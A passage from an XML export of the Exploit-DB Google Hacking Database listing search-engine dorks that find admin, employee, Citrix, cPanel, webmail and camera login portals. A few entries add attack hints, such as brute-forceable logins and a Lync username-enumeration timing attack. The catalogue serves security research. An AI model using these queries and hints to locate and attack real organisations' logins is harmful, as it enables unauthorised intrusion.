<author>Deepesh Kumar Pandey</author>
</entry>
<entry>
<id>5334</id>
<link>https://www.exploit-db.com/ghdb/5334</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminpanel/index.php</shortDescription>
<textualDescription>GOOLGE DORK
Dork: inurl:adminpanel/index.php
Author: Sathishshan
Info: Contains sensitive directory information of adminpanel login
</textualDescription>
<query>inurl:adminpanel/index.php</query>
<querystring>https://www.google.com/search?q=inurl:adminpanel/index.php</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Sathishshan</author>
</entry>
<entry>
<id>6203</id>
<link>https://www.exploit-db.com/ghdb/6203</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admlogin.asp</shortDescription>
<textualDescription># Google Dork : inurl:admlogin.asp
# Description:- This Page contains various asp admin login pages for a web server
# Author: Md Anzaruddin
# Date: 04/06/2020
</textualDescription>
<query>inurl:admlogin.asp</query>
<querystring>https://www.google.com/search?q=Google Dork</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Md Anzaruddin</author>
</entry>
<entry>
<id>6159</id>
<link>https://www.exploit-db.com/ghdb/6159</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admlogin.aspx</shortDescription>
<textualDescription>List of Admin Login Page of various website</textualDescription>
<query>inurl:admlogin.aspx</query>
<querystring>https://www.google.com/search?q=inurl:admlogin.aspx</querystring>
<edb></edb>
<date>2020-06-01</date>
<author>Vikash Kumar</author>
</entry>
<entry>
<id>6163</id>
<link>https://www.exploit-db.com/ghdb/6163</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admlogin.php</shortDescription>
<textualDescription># Google Dork: inurl:admlogin.php
# Description:- This page contains various php admin login pages for a web
server.
# Author: Suhanaz Kazi
# Date: 29-May-2020
--
Regards,
Suhanaz
</textualDescription>
<query>inurl:admlogin.php</query>
<querystring>https://www.google.com/search?q=inurl:admlogin.php</querystring>
<edb></edb>
<date>2020-06-02</date>
<author>Suhanaz Kazi</author>
</entry>
<entry>
<id>4091</id>
<link>https://www.exploit-db.com/ghdb/4091</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:agc/vicidial.php</shortDescription>
<textualDescription>This reveals the version of vicidial used and gives the access changing to
/agc/vicidial.php to vicidial/admin.php to give the direct access to admin
login page .</textualDescription>
<query>inurl:agc/vicidial.php</query>
<querystring>https://www.google.com/search?q=inurl:agc/vicidial.php</querystring>
<edb></edb>
<date>2015-10-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6576</id>
<link>https://www.exploit-db.com/ghdb/6576</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:AIMS/PS</shortDescription>
<textualDescription># Google Dork: inurl:AIMS/PS
# Date: 9/28/2020
# Exploit Author: Javier Bernardo
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:AIMS/PS</query>
<querystring>https://www.google.com/search?q=inurl:AIMS/PS</querystring>
<edb></edb>
<date>2020-09-28</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>8060</id>
<link>https://www.exploit-db.com/ghdb/8060</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:assystnetmob</shortDescription>
<textualDescription># Google Dork: inurl:assystnetmob
# Pages Containing Login Portals
# Date:13/02/2023
# Exploit Author: Zayed AlJaberi</textualDescription>
<query>inurl:assystnetmob</query>
<querystring>https://www.google.com/search?q=inurl:assystnetmob</querystring>
<edb></edb>
<date>2023-02-13</date>
<author>Zayed AlJaberi</author>
</entry>
<entry>
<id>6174</id>
<link>https://www.exploit-db.com/ghdb/6174</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:auth/Login</shortDescription>
<textualDescription># Google Dork: inurl:auth/Login
# Description:- This page contains various login pages for a web server.
# Author: Suhanaz Kazi
# Date: 29-May-2020
# Linkedin: http://linkedin.com/in/suhanaaz
--
Regards,
Suhanaz
</textualDescription>
<query>inurl:auth/Login</query>
<querystring>https://www.google.com/search?q=inurl:auth/Login</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Suhanaz Kazi</author>
</entry>
<entry>
<id>7078</id>
<link>https://www.exploit-db.com/ghdb/7078</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:auth/login?returnUrl</shortDescription>
<textualDescription>Pages Containing Login Portals
# Google Dork: inurl:auth/login?returnUrl
# Date: 6/25/2020
# Exploit Author: Javier Bernardo
</textualDescription>
<query>inurl:auth/login?returnUrl</query>
<querystring>https://www.google.com/search?q=inurl:auth/login?returnUrl</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>8038</id>
<link>https://www.exploit-db.com/ghdb/8038</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:authorization.do intext:&quot;ADSelfService Plus&quot;</shortDescription>
<textualDescription># Google Dork: inurl:authorization.do intext:&quot;ADSelfService Plus&quot;
# Pages Containing Login Portals
# Date:31/01/2023
# Exploit Author: Stuart Steenberg</textualDescription>
<query>inurl:authorization.do intext:&quot;ADSelfService Plus&quot;</query>
<querystring>https://www.google.com/search?q=inurl:authorization.do intext:&quot;ADSelfService Plus&quot;</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>6748</id>
<link>https://www.exploit-db.com/ghdb/6748</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:authorization.ping</shortDescription>
<textualDescription>Google Dork: inurl:authorization.ping
Description: Pages containing portals for login or employee account recovery.
Date: 01/01/2021
Author: Sunil Singh
</textualDescription>
<query>inurl:authorization.ping</query>
<querystring>https://www.google.com/search?q=inurl:authorization.ping</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Sunil Singh</author>
</entry>
<entry>
<id>6879</id>
<link>https://www.exploit-db.com/ghdb/6879</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:b2b/init.do</shortDescription>
<textualDescription>Logins
# Google Dork: inurl:b2b/init.do
# Date: 4/18/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
</textualDescription>
<query>inurl:b2b/init.do</query>
<querystring>https://www.google.com/search?q=inurl:b2b/init.do</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>4252</id>
<link>https://www.exploit-db.com/ghdb/4252</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:backoffice intitle:login</shortDescription>
<textualDescription># Exploit Title: BackOffice Login Portals
# Google Dork: inurl:backoffice intitle:login
# Description: Dork to find login portal access to Backoffice CMS..
# Date: 01/04/2016
# Exploit Author: XDarkCoder</textualDescription>
<query>inurl:backoffice intitle:login</query>
<querystring>https://www.google.com/search?q=inurl:backoffice intitle:login</querystring>
<edb></edb>
<date>2016-04-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>920</id>
<link>https://www.exploit-db.com/ghdb/920</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0</shortDescription>
<textualDescription>eHealth, a network management solution, enables its users to manage performance and availability of LANs, WANs, routers, Switches, Frame Relay, ATM, Remote Access Equipment, QoS, Wireless LAN, DAL, Voice and Cable technologies.</textualDescription>
<query>inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0</query>
<querystring>https://www.google.com/search?num=100&amp;q=inurl%3Abin.welcome.sh+%7C+inurl%3Abin.welcome.bat+%7C+intitle%3AeHealth.5.0</querystring>
<edb></edb>
<date>2005-03-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>6308</id>
<link>https://www.exploit-db.com/ghdb/6308</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:candidatelogin.aspx</shortDescription>
<textualDescription>Google Dork : inurl:candidatelogin.aspx
Description: Used to find candidate login page of different company website
--
With Regards,
Akhil G Krishnan
</textualDescription>
<query>inurl:candidatelogin.aspx</query>
<querystring>https://www.google.com/search?q=inurl:candidatelogin.aspx</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Akhil G Krishnan</author>
</entry>
<entry>
<id>8159</id>
<link>https://www.exploit-db.com/ghdb/8159</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:cas/login?service=http</shortDescription>
<textualDescription># Google Dork: inurl:cas/login?service=http
# Pages Containing Login Portals
# Date:17/04/2023
# Exploit Author: Stuart Steenberg</textualDescription>
<query>inurl:cas/login?service=http</query>
<querystring>https://www.google.com/search?q=inurl:cas/login?service=http</querystring>
<edb></edb>
<date>2023-04-17</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>426</id>
<link>https://www.exploit-db.com/ghdb/426</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:cgi-bin/ultimatebb.cgi?ubb=login</shortDescription>
<textualDescription>These are login pages for Infopop's message board UBB.classic. For the UBB.threads you can use this search This next search finds all UBB pages with the infopop image and a link to the developers.http://www.google.com/search?num=100&amp;&amp;safe=off&amp;q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&amp;filter=1</textualDescription>
<query>inurl:cgi-bin/ultimatebb.cgi?ubb=login</query>
<querystring>https://www.google.com/search?q=inurl%3Acgi-bin%2Fultimatebb.cgi%3Fubb%3Dlogin</querystring>
<edb></edb>
<date>2004-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>5315</id>
<link>https://www.exploit-db.com/ghdb/5315</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:cgi/login.pl</shortDescription>
<textualDescription>Dorks:
inurl:cgi/login.pl
inurl:cgi/login.pl intext:&quot;Matrix Science&quot;
-M. Cory Billington</textualDescription>
<query>inurl:cgi/login.pl</query>
<querystring>https://www.google.com/search?q=inurl:cgi/login.pl</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>M. Cory Billington</author>
</entry>
<entry>
<id>5703</id>
<link>https://www.exploit-db.com/ghdb/5703</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:check_mk/login.py</shortDescription>
<textualDescription>Dork for search Checkmk login pages:
Checkmk has long been available as an open source IT monitoring solution, supported by a large user community
web:https://checkmk.com/
[https://checkmk.com/images/apple-touch-icon.png]
Infrastructure
&amp; Application Monitoring | checkmk
Checkmk
is a leading tool for Infrastructure &amp; Application Monitoring. Simple configuration, scalable, flexible. Open Source and Enterprise.
checkmk.com
Author:
UsmanAliMaan
</textualDescription>
<query>inurl:check_mk/login.py</query>
<querystring>https://www.google.com/search?q=inurl:check_mk/login.py</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>UsmanAliMaan</author>
</entry>
<entry>
<id>4285</id>
<link>https://www.exploit-db.com/ghdb/4285</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:citrix inurl:login.asp -site:citrix.com</shortDescription>
<textualDescription>Citrix Login Portals
inurl:citrix inurl:login.asp -site:citrix.com</textualDescription>
<query>inurl:citrix inurl:login.asp -site:citrix.com</query>
<querystring>https://www.google.com/search?q=inurl:citrix inurl:login.asp -site:citrix.com</querystring>
<edb></edb>
<date>2016-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>991</id>
<link>https://www.exploit-db.com/ghdb/991</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Citrix/MetaFrame/default/default.aspx</shortDescription>
<textualDescription>MetaFrame Presentation Server</textualDescription>
<query>inurl:Citrix/MetaFrame/default/default.aspx</query>
<querystring>https://www.google.com/search?q=inurl%3ACitrix%2FMetaFrame%2Fdefault%2Fdefault.aspx</querystring>
<edb></edb>
<date>2005-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4025</id>
<link>https://www.exploit-db.com/ghdb/4025</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Citrix/MetaframeXP</shortDescription>
<textualDescription>Servers Citrix web xD.
By Rootkit.</textualDescription>
<query>inurl:Citrix/MetaframeXP</query>
<querystring>https://www.google.com/search?q=inurl:Citrix/MetaframeXP</querystring>
<edb></edb>
<date>2015-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6117</id>
<link>https://www.exploit-db.com/ghdb/6117</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:client_id=</shortDescription>
<textualDescription># Google Dork: inurl:client_id=
# Various pages containing login portals.
# Date: 22/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:client_id=</query>
<querystring>https://www.google.com/search?q=inurl:client_id=</querystring>
<edb></edb>
<date>2020-05-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6474</id>
<link>https://www.exploit-db.com/ghdb/6474</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:client_login=</shortDescription>
<textualDescription>Exploit Title: Pages containing login portals.
Google Dork: inurl:client_login=
Date: 10/08/2020
Exploit Author: Sanu Jose M
Thanks &amp; regards,
SANU JOSE M
</textualDescription>
<query>inurl:client_login=</query>
<querystring>https://www.google.com/search?q=inurl:client_login=</querystring>
<edb></edb>
<date>2020-08-11</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6391</id>
<link>https://www.exploit-db.com/ghdb/6391</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:client_password=</shortDescription>
<textualDescription>Google Dork: inurl:client_password=
Exploit Title: various pages containing password reset &amp;
reminder portals and login portals.
Date: 10/07/2020
Exploit Author: Sanu Jose M</textualDescription>
<query>inurl:client_password=</query>
<querystring>https://www.google.com/search?q=inurl:client_password=</querystring>
<edb></edb>
<date>2020-07-10</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>595</id>
<link>https://www.exploit-db.com/ghdb/595</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:confixx inurl:login|anmeldung</shortDescription>
<textualDescription>Confixx is a webhosting management tool and has the following features: * create resellers, * edit personal data, * manage newsletters to resellers, * comprehensive stats, * powerful evaluation of traffic, * manage e-mail templates, * lock resellers. security focus has a vulnerability report on this.vendor: http://www.sw-soft.com/en/products/confixx/</textualDescription>
<query>inurl:confixx inurl:login|anmeldung</query>
<querystring>https://www.google.com/search?q=inurl%3Aconfixx+inurl%3Alogin%7Canmeldung</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6583</id>
<link>https://www.exploit-db.com/ghdb/6583</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:console-selfservice</shortDescription>
<textualDescription># Google Dork: inurl:console-selfservice# Date: 9/10/2020
# Exploit Author: Javier Bernardo
# RSA Login pages
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:console-selfservice</query>
<querystring>https://www.google.com/search?q=inurl:console-selfservice</querystring>
<edb></edb>
<date>2020-09-29</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>7785</id>
<link>https://www.exploit-db.com/ghdb/7785</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:console/login.jsp</shortDescription>
<textualDescription># Google Dork: inurl:console/login.jsp
# Pages Containing Login Portals
# Date: 12/11/2021
# Exploit Author: Md Anzaruddin</textualDescription>
<query>inurl:console/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl:console/login.jsp</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Md Anzaruddin</author>
</entry>
<entry>
<id>711</id>
<link>https://www.exploit-db.com/ghdb/711</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:coranto.cgi intitle:Login (Authorized Users Only)</shortDescription>
<textualDescription>Coranto is one of the most powerful Content Management System (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site, it supports multiple browsers, multiple operating systems, produces standard compliant html, has a huge variety of excellent features and is fully extendible via addons. It is free for use on any site, personal or commercial!</textualDescription>
<query>inurl:coranto.cgi intitle:Login (Authorized Users Only)</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Acoranto.cgi+intitle%3ALogin+%28Authorized+Users+Only%29</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6219</id>
<link>https://www.exploit-db.com/ghdb/6219</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Cpanel/login.aspx</shortDescription>
<textualDescription>#Google Dork:- inurl:Cpanel/login.aspx
#Description: This Page Contains Various Admin login Pages for a web
server. Most of them are Vulnerable to Brute force.
#Author: Md Anzaruddin
Linkedin: https://www.linkedin.com/in/mdanzaruddin/
Twitter:https://twitter.com/mdanzaruddin
#Date: 04-June-2020
---
Regards:
Md Anzaruddin
</textualDescription>
<query>inurl:Cpanel/login.aspx</query>
<querystring>https://www.google.com/search?q=inurl:Cpanel/login.aspx</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Md Anzaruddin</author>
</entry>
<entry>
<id>6220</id>
<link>https://www.exploit-db.com/ghdb/6220</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Cpanel/login.php</shortDescription>
<textualDescription>#Google Dork:- inurl:Cpanel/login.php
#Description: This Page Contains Various Admin login Pages for a web server.
#Author: Md Anzaruddin
Linkedin: https://www.linkedin.com/in/mdanzaruddin/
Twitter:https://twitter.com/mdanzaruddin
#Date: 04-June-2020
---
Regards:
Md Anzaruddin
</textualDescription>
<query>inurl:Cpanel/login.php</query>
<querystring>https://www.google.com/search?q=inurl:Cpanel/login.php</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Md Anzaruddin</author>
</entry>
<entry>
<id>1076</id>
<link>https://www.exploit-db.com/ghdb/1076</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:csCreatePro.cgi</shortDescription>
<textualDescription>Create Pro logon pages.</textualDescription>
<query>inurl:csCreatePro.cgi</query>
<querystring>https://www.google.com/search?q=inurl%3AcsCreatePro.cgi&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-08-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>5191</id>
<link>https://www.exploit-db.com/ghdb/5191</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:ctl/Login/Default.aspx</shortDescription>
<textualDescription>The Dork: inurl:ctl/Login/Default.aspx reveals the CMS Login page for the Dot Net Nuke CMS.
Versions DNN 7.1.0 and earlier / DNN 6.2.8 and earlier are vulnerable to XXS ( CVE-2013-4649 ).
This can be tested by reviewing the page source code and searching for default.css where the version will precede it. </textualDescription>
<query>inurl:ctl/Login/Default.aspx</query>
<querystring>https://www.google.com/search?q=inurl:ctl/Login/Default.aspx</querystring>
<edb></edb>
<date>2019-04-23</date>
<author>F1uffyGoat</author>
</entry>
<entry>
<id>5287</id>
<link>https://www.exploit-db.com/ghdb/5287</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Dashboard.jspa intext:&quot;Atlassian Jira Project Management Software&quot;</shortDescription>
<textualDescription>Page Containing Login Portals
Targeted platform: Jira Project and Issue Tracking Software
Dork: inurl:Dashboard.jspa intext:&quot;Atlassian Jira Project Management Software&quot;
</textualDescription>
<query>inurl:Dashboard.jspa intext:&quot;Atlassian Jira Project Management Software&quot;</query>
<querystring>https://www.google.com/search?q=inurl:Dashboard.jspa intext:&quot;Atlassian Jira Project Management Software&quot;</querystring>
<edb></edb>
<date>2019-07-24</date>
<author>Vishnu Padmakumar</author>
</entry>
<entry>
<id>566</id>
<link>https://www.exploit-db.com/ghdb/566</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:default.asp intitle:&quot;WebCommander&quot;</shortDescription>
<textualDescription>Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings.</textualDescription>
<query>inurl:default.asp intitle:&quot;WebCommander&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Adefault.asp+intitle%3A%22WebCommander%22+</querystring>
<edb></edb>
<date>2004-10-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4786</id>
<link>https://www.exploit-db.com/ghdb/4786</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:default.aspx?ReturnUrl=/spssmr -stackoverflow -youtube.com -github</shortDescription>
<textualDescription>IBM® SPSS® Data Collection Interviewer Server Administration login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:default.aspx?ReturnUrl=/spssmr -stackoverflow -youtube.com -github</query>
<querystring>https://www.google.com/search?q=inurl:default.aspx?ReturnUrl=/spssmr -stackoverflow -youtube.com -github</querystring>
<edb></edb>
<date>2018-04-18</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7211</id>
<link>https://www.exploit-db.com/ghdb/7211</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:destination=portals</shortDescription>
<textualDescription># Google Dork: inurl:destination=portals
# Pages Containing Login Portals
# Date: 11/09/2021
# Exploit Author: Vaibhav Kumar Srivastava</textualDescription>
<query>inurl:destination=portals</query>
<querystring>https://www.google.com/search?q=inurl:destination=portals</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Vaibhav Kumar Srivastava</author>
</entry>
<entry>
<id>6493</id>
<link>https://www.exploit-db.com/ghdb/6493</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:device.rsp -com -www</shortDescription>
<textualDescription>Google Dork: inurl:device.rsp -com -www
Description: This Google Dork is helpful in finding all the login portals
of devices such as XVR, NVR, HVR, DVR, MDVR, AHD, HD IP Camera etc.
Author: Sibi Mathew George
</textualDescription>
<query>inurl:device.rsp -com -www</query>
<querystring>https://www.google.com/search?q=inurl:device.rsp -com -www</querystring>
<edb></edb>
<date>2020-08-24</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>7071</id>
<link>https://www.exploit-db.com/ghdb/7071</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:device_status.html &quot;login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:device_status.html &quot;login&quot;
# Category: Various Online Devices
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>inurl:device_status.html &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:device_status.html &quot;login&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4314</id>
<link>https://www.exploit-db.com/ghdb/4314</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Dialin/Conference.aspx</shortDescription>
<textualDescription># Exploit Title: Google dork to discover Lync Server 2013
# Google Dork: inurl:Dialin/Conference.aspx
# Date: 2016-08-03
# Exploit Author: @nyxgeek
# Vendor Homepage: microsoft.com
This search reveals Lync Server 2013 dialin login pages. A user
enumeration
timing attack can be performed against these pages. Long response time
indicates that the username is invalid. Short response time indicates
that
you have a valid username.</textualDescription>
<query>inurl:Dialin/Conference.aspx</query>
<querystring>https://www.google.com/search?q=inurl:Dialin/Conference.aspx</querystring>
<edb></edb>
<date>2016-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4264</id>
<link>https://www.exploit-db.com/ghdb/4264</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:dynamic.php?page=mailbox</shortDescription>
<textualDescription># Exploit Title: Webmail login pages
# Google Dork: inurl:dynamic.php?page=mailbox
# Date: 04/14/2016
# Author: Stephanie Jensen
Summary
webmail login pages - many with obvious usernames in search results.
Login attempts seem unlimited.
</textualDescription>
<query>inurl:dynamic.php?page=mailbox</query>
<querystring>https://www.google.com/search?q=inurl:dynamic.php?page=mailbox</querystring>
<edb></edb>
<date>2016-04-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6799</id>
<link>https://www.exploit-db.com/ghdb/6799</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:ejbexplorer</shortDescription>
<textualDescription># Google Dork: inurl:ejbexplorer
# Date: 2/15/2020
# Exploit Author: Javier Bernardo
# Pages Containing Login Portals
Javier Bernardo
*Ethical Hacker | Information Security Engineer
Buenos Aires - Argentina
</textualDescription>
<query>inurl:ejbexplorer</query>
<querystring>https://www.google.com/search?q=inurl:ejbexplorer</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6190</id>
<link>https://www.exploit-db.com/ghdb/6190</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:emplogin.aspx</shortDescription>
<textualDescription># Google Dork: inurl:emplogin.aspx
# List of Employee login page of various website
# Author: AJAYSEN R
</textualDescription>
<query>inurl:emplogin.aspx</query>
<querystring>https://www.google.com/search?q=inurl:emplogin.aspx</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>AJAYSEN R</author>
</entry>
<entry>
<id>6215</id>
<link>https://www.exploit-db.com/ghdb/6215</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:emplogin.html</shortDescription>
<textualDescription># Google Dork: inurl:emplogin.html
# Exploit Title: Find the employee login page in different website including 'emplogin' as substring.
# Author: Pritam Singh
Thanks,
*Pritam Singh*
Security Researcher
CEH, RHCSA, N+
email: pritamsingh.cyber@gmail.com
</textualDescription>
<query>inurl:emplogin.html</query>
<querystring>https://www.google.com/search?q=inurl:emplogin.html</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Pritam Singh</author>
</entry>
<entry>
<id>7228</id>
<link>https://www.exploit-db.com/ghdb/7228</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:employee-login.html</shortDescription>
<textualDescription># Google Dork: inurl:employee-login.html
# Pages Containing Login Portals
# Date: 14/09/2021
# Exploit Author: Saiju Pillai</textualDescription>
<query>inurl:employee-login.html</query>
<querystring>https://www.google.com/search?q=inurl:employee-login.html</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Saiju Pillai</author>
</entry>
<entry>
<id>6227</id>
<link>https://www.exploit-db.com/ghdb/6227</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:employee-login.php</shortDescription>
<textualDescription>Dork: inurl:employee-login.php
Description: This google dorks lists out employee login pages on web servers.
Author: Abhi Chitkara
</textualDescription>
<query>inurl:employee-login.php</query>
<querystring>https://www.google.com/search?q=inurl:employee-login.php</querystring>
<edb></edb>
<date>2020-06-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7788</id>
<link>https://www.exploit-db.com/ghdb/7788</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:EMSWebClient/</shortDescription>
<textualDescription># Google Dork: inurl:EMSWebClient/
# Pages Containing Login Portals
# Date: 12/11/2021
# Exploit Author: Soriful Islam Shoaib</textualDescription>
<query>inurl:EMSWebClient/</query>
<querystring>https://www.google.com/search?q=inurl:EMSWebClient/</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Soriful Islam Shoaib</author>
</entry>
<entry>
<id>6966</id>
<link>https://www.exploit-db.com/ghdb/6966</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:EMSWebClient/Login.aspx</shortDescription>
<textualDescription>#Exploit Title : Pages Containing Login portals.
#Google Dork : inurl:EMSWebClient/Login.aspx
#Exploit Author: Md Anzaruddin
#Regards
#Md Anzaruddin
</textualDescription>
<query>inurl:EMSWebClient/Login.aspx</query>
<querystring>https://www.google.com/search?q=inurl:EMSWebClient/Login.aspx</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>Md Anzaruddin</author>
</entry>
<entry>
<id>6116</id>
<link>https://www.exploit-db.com/ghdb/6116</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:enter.php?phpbb_root_path=</shortDescription>
<textualDescription># Google Dork: inurl:enter.php?phpbb_root_path=
# Various pages containing login portals.
# Date: 22/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:enter.php?phpbb_root_path=</query>
<querystring>https://www.google.com/search?q=inurl:enter.php?phpbb_root_path=</querystring>
<edb></edb>
<date>2020-05-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>992</id>
<link>https://www.exploit-db.com/ghdb/992</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:exchweb/bin/auth/owalogon.asp</shortDescription>
<textualDescription>Outlook Web Access Login POrtal</textualDescription>
<query>inurl:exchweb/bin/auth/owalogon.asp</query>
<querystring>https://www.google.com/search?q=inurl%3Aexchweb%2Fbin%2Fauth%2Fowalogon.asp&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6787</id>
<link>https://www.exploit-db.com/ghdb/6787</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:ext/pwdreset</shortDescription>
<textualDescription># Google Dork: inurl:ext/pwdreset
# Date: 2/9/2020
# Exploit Author: Javier Bernardo
*Ethical Hacker | Information Security Engineer*
</textualDescription>
<query>inurl:ext/pwdreset</query>
<querystring>https://www.google.com/search?q=inurl:ext/pwdreset</querystring>
<edb></edb>
<date>2021-02-11</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>5114</id>
<link>https://www.exploit-db.com/ghdb/5114</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:F5Networks-SSO-Req?</shortDescription>
<textualDescription>BIG-IP corporate logins
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:F5Networks-SSO-Req?</query>
<querystring>https://www.google.com/search?q=inurl:F5Networks-SSO-Req?</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7479</id>
<link>https://www.exploit-db.com/ghdb/7479</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:fgtauth?</shortDescription>
<textualDescription># Google Dork: inurl:fgtauth?
# Pages Containing Login Portals
# Date:22/10/2021
